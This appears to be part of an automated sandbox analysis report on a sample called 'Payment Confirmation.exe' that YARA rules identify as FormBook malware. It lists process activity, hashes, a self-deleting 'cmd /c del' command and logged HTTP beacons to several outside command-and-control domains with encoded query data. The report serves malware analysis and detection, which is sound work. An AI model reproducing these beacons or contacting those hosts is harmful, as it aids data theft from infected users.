Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" ><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be a


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                2 | 192.168.2.6 | 49803 | 3.223.115.185 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Oct 13, 2021 16:32:32.133338928 CEST | 4962 | OUT | GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=Tgem/L35NV+dfrLXgk9e0bf+TOX6XAT/DQQ171WvvWAafG5cKA0QEsXJDfpFnN+dx51z362pVQ== HTTP/1.1
                                                Host: www.altitudebc.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Oct 13, 2021 16:32:32.270781994 CEST | 4987 | IN | HTTP/1.1 302 Found
                                                Cache-Control: private
                                                Content-Type: text/html; charset=utf-8
                                                Location: https://www.hugedomains.com/domain_profile.cfm?d=altitudebc&e=com
                                                Server: Microsoft-IIS/8.5
                                                X-Powered-By: ASP.NET
                                                Date: Wed, 13 Oct 2021 14:31:35 GMT
                                                Connection: close
                                                Content-Length: 186
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 75 67 65 64 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 64 6f 6d 61 69 6e 5f 70 72 6f 66 69 6c 65 2e 63 66 6d 3f 64 3d 61 6c 74 69 74 75 64 65 62 63 26 61 6d 70 3b 65 3d 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.hugedomains.com/domain_profile.cfm?d=altitudebc&amp;e=com">here</a>.</h2></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                3 | 192.168.2.6 | 49804 | 82.98.134.154 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Oct 13, 2021 16:32:37.462970972 CEST | 5528 | OUT | GET /b2c0/?EN9pK2=nxasyuVnQv2XAhCx9zKAxU4oBW67ilDivwaG6+ZxC2XBQxj4p4XVuU/9/EEmkzFjfVH8yNww+g==&nZR4=4hr8Pfz HTTP/1.1
                                                Host: www.unasolucioendesa.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Oct 13, 2021 16:32:37.501957893 CEST | 5529 | IN | HTTP/1.1 301 Moved Permanently
                                                Date: Wed, 13 Oct 2021 14:32:37 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Content-Length: 0
                                                Connection: close
                                                Location: https://www.unasolucioendesa.com/b2c0/?EN9pK2=nxasyuVnQv2XAhCx9zKAxU4oBW67ilDivwaG6+ZxC2XBQxj4p4XVuU/9/EEmkzFjfVH8yNww+g==&nZR4=4hr8Pfz
                                                Server: HTTPd


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                4 | 192.168.2.6 | 49809 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Oct 13, 2021 16:32:42.570636034 CEST | 5539 | OUT | GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=/Ci6lA1wHDq9VFgkYzq6dZWl1lKVRbc/m6zzwdji+NobEq0OLQXkZXfSz/GKNzBGFBcC52wWgA== HTTP/1.1
                                                Host: www.elliotpioneer.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Oct 13, 2021 16:32:42.685873032 CEST | 5540 | IN | HTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Wed, 13 Oct 2021 14:32:42 GMT
                                                Content-Type: text/html
                                                Content-Length: 275
                                                ETag: "615f93b1-113"
                                                Via: 1.1 google
                                                Connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                5 | 192.168.2.6 | 49810 | 172.105.103.207 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Oct 13, 2021 16:32:48.382261992 CEST | 5541 | OUT | GET /b2c0/?EN9pK2=Rsl6eVz8IBrCXPhLu4YLklwV2F0wFlRiIbasvGTIitkrxs2ugDluNYG7ptidipeQIllJsRrQVw==&nZR4=4hr8Pfz HTTP/1.1
                                                Host: www.thesewhitevvalls.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                6 | 192.168.2.6 | 49822 | 52.206.159.80 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Oct 13, 2021 16:32:54.093128920 CEST | 5578 | OUT | GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=Evx8EsBGe658r9iJtrgJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDcWmrfnS5cDyGsxIQ== HTTP/1.1
                                                Host: www.lumberjackguitarloops.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Oct 13, 2021 16:32:54.231038094 CEST | 5581 | IN | HTTP/1.1 301 Moved Permanently
                                                Content-length: 0
                                                Location: https://www.lumberjackguitarloops.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=Evx8EsBGe658r9iJtrgJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDcWmrfnS5cDyGsxIQ==
                                                Connection: close


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                7 | 192.168.2.6 | 49840 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Oct 13, 2021 16:33:00.285758972 CEST | 5620 | OUT | GET /b2c0/?EN9pK2=HN6lmWAsN4eOR9yN7lRwrlIaFZSjtluPDfuHRsVFTQ6SUbSrxCD+Omdw+9AgIy4ohKSIyg89VQ==&nZR4=4hr8Pfz HTTP/1.1
                                                Host: www.carts-amazon.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Oct 13, 2021 16:33:00.400927067 CEST | 5620 | IN | HTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Wed, 13 Oct 2021 14:33:00 GMT
                                                Content-Type: text/html
                                                Content-Length: 275
                                                ETag: "615f93b1-113"
                                                Via: 1.1 google
                                                Connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                8 | 192.168.2.6 | 49841 | 45.91.80.182 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Oct 13, 2021 16:33:05.709494114 CEST | 5621 | OUT | GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=qdiIlJa1sa0FYbjdkssa7+Uw/DbrhXlci2BZlXFuRXTISdQByqYUnROnYc602mbs2qASatieoQ== HTTP/1.1
                                                Host: www.chinaopedia.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Oct 13, 2021 16:33:06.303915977 CEST | 5622 | IN | HTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Wed, 13 Oct 2021 14:33:06 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Set-Cookie: security_session_verify=e3f107f1b9aaa89fb44b8d647caca7b2; expires=Sat, 16-Oct-21 22:33:05 GMT; path=/; HttpOnly
                                                Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                9 | 192.168.2.6 | 49842 | 62.210.5.81 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Oct 13, 2021 16:33:11.330621958 CEST | 5623 | OUT | GET /b2c0/?EN9pK2=ESINuQxl50fq+oqp7R8PJEZRcvMrOgZYniX8ZAjuMgliJzJjCEYTKkgZH+GsrKs/YLP3GwXWaQ==&nZR4=4hr8Pfz HTTP/1.1
                                                Host: www.atp-cayenne.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:


                                                Code Manipulations

                                                Statistics

                                                Behavior

                                                System Behavior

                                                General

                                                Start time:16:31:11
                                                Start date:13/10/2021
                                                Path:C:\Users\user\Desktop\Payment Confirmation.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Users\user\Desktop\Payment Confirmation.exe'
                                                Imagebase:0x400000
                                                File size:455901 bytes
                                                MD5 hash:98FFC3C812E6CEC919EBD286973E2002
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                General

                                                Start time:16:31:13
                                                Start date:13/10/2021
                                                Path:C:\Users\user\Desktop\Payment Confirmation.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Users\user\Desktop\Payment Confirmation.exe'
                                                Imagebase:0x400000
                                                File size:455901 bytes
                                                MD5 hash:98FFC3C812E6CEC919EBD286973E2002
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                General

                                                Start time:16:31:17
                                                Start date:13/10/2021
                                                Path:C:\Windows\explorer.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\Explorer.EXE
                                                Imagebase:0x7ff6f22f0000
                                                File size:3933184 bytes
                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:high

                                                General

                                                Start time:16:31:43
                                                Start date:13/10/2021
                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\msiexec.exe
                                                Imagebase:0x9b0000
                                                File size:59904 bytes
                                                MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:high

                                                General

                                                Start time:16:31:49
                                                Start date:13/10/2021
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:/c del 'C:\Users\user\Desktop\Payment Confirmation.exe'
                                                Imagebase:0x2a0000
                                                File size:232960 bytes
                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Start time:16:31:49
                                                Start date:13/10/2021
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff61de10000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Disassembly

                                                Code Analysis
